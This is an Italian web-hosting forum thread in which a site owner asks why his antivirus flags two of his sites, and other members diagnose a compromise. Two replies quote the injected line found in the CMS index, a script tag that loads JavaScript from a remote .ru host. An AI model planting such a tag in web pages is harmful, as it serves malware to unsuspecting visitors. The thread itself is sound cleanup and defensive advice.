Visualizzazione risultati 1 fino 9 di 9

Discussione: Due miei siti mi segnalano un virus!

Guest

Predefinito Due miei siti mi segnalano un virus!

Salve, ho due problemi, credo......

Due miei siti (in firma, sono AssaultCube Italia e Lite CMS) mi segnalano un virus ogni volta che ci entro (uso Avast)..... E' un problema solo mio? Potreste farmi il favore di verificare se con i vostri antivirus fa lo stesso?
    Ovviamente scusate lo spam, anche se involontario..

L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese

Predefinito

Su litecms noscript mi blocca: riotassistance.ru
    Codice PHP:
    </body></html>
    <
    script type="text/javascript" src="http://riotassistance.ru/Base_Station.js"></script>
    <!--530d3cb7a3fbbc172315b23cd402362a-->
    sull'altro non rilevo nulla di irregolare.

L'avatar di binarysun
    binarysun non è connesso Utente storico

Predefinito

"L'intelligenza è una pianta che va curata continuamente.
    Dovreste vedere com'è bello, il mio bonsai."
    Rat-man®

[Gradient Text]
    [Su che server sei?]
    ->flickr

L'avatar di Gianluca
    Gianluca non è connesso Amministratore

Predefinito

Pare un problema analogo a quello che hai segnalato qui: http://forum.it.altervista.org/piazz...o-hackato.html

Fai una pulizia attenta del tuo pc e cambia le password ad ogni sito e mailbox che gestisci, altrimenti il problema potrebbe estendersi anche ad altri tuoi siti.
    Gianluca

Guest

Predefinito

Il fatto è che AC Italia è stato colpito da quei b*stardi (scusate, ma un pò fa incazzare la cosa) e ho dovuto ripristinare tutto, mentre Lite CMS che non lo tocco da mesi con l'FTP mi segnala il virus ma non è stato intaccato nulla a livello visivo..

@Gianluca: si, è proprio quello temo...... Il punto è che ho formattato neanche 7 giorni fa, e ora per sicurezza ho disinstallato FileZilla...

L'avatar di Gianluca
    Gianluca non è connesso Amministratore

Predefinito

Se si tratta di questo: http://blog.unmaskparasites.com/2010...b-of-koobface/ o di qualcosa dal funzionamento analogo, anche se il tuo pc è stato ripulito devi comunque procedere al cambio di tutte le password.
    Gianluca

Guest

Predefinito

Scusate l'up tardivo di sei giorni, ma ora la cosa è diventata strana.
    Avast non mi segnala più alcun virus su Lite CMS, ma il dubbio sorge, perchè ora l'analisi di Google lo segnala come sospetto. Per l'altro, AssaultCube Italia, per ora stando a quello che dice la pagina dell'analisi, non è stato ancora visitato da Google, e Avast non mi segnala nulla......
    Consigli su come rimuoverlo almeno da Lite CMS? Perchè pur frugando nel sorgente del CMS stesso la stringa sospetta non si trova proprio........

L'avatar di darkwolf
    darkwolf non è connesso Salvatore Noschese

Predefinito

Il codice c'è ancora e firefox non mi fa più accedere (sito sospetto)
    Codice PHP:
    <script type="text/javascript" src="http://riotassistance.ru/Base_Station.js"></script>
    <!--530d3cb7a3fbbc172315b23cd402362a-->
    Io salverei file e file del database (trattandosi di un flat) in locale e cercherei la stringa con notepad++ su tutti i tipi di file.
    Quel codice c'è, da qualche parte deve pur esserci.

Guest

Predefinito

La stringa infame pare essersi innestata nell'index, e l'ho rimossa senza problemi....... Non so se si sia innestata in altri file, ma penso di no...... Non resta che aspettare l'analisi di Google quando lo rivisiterà...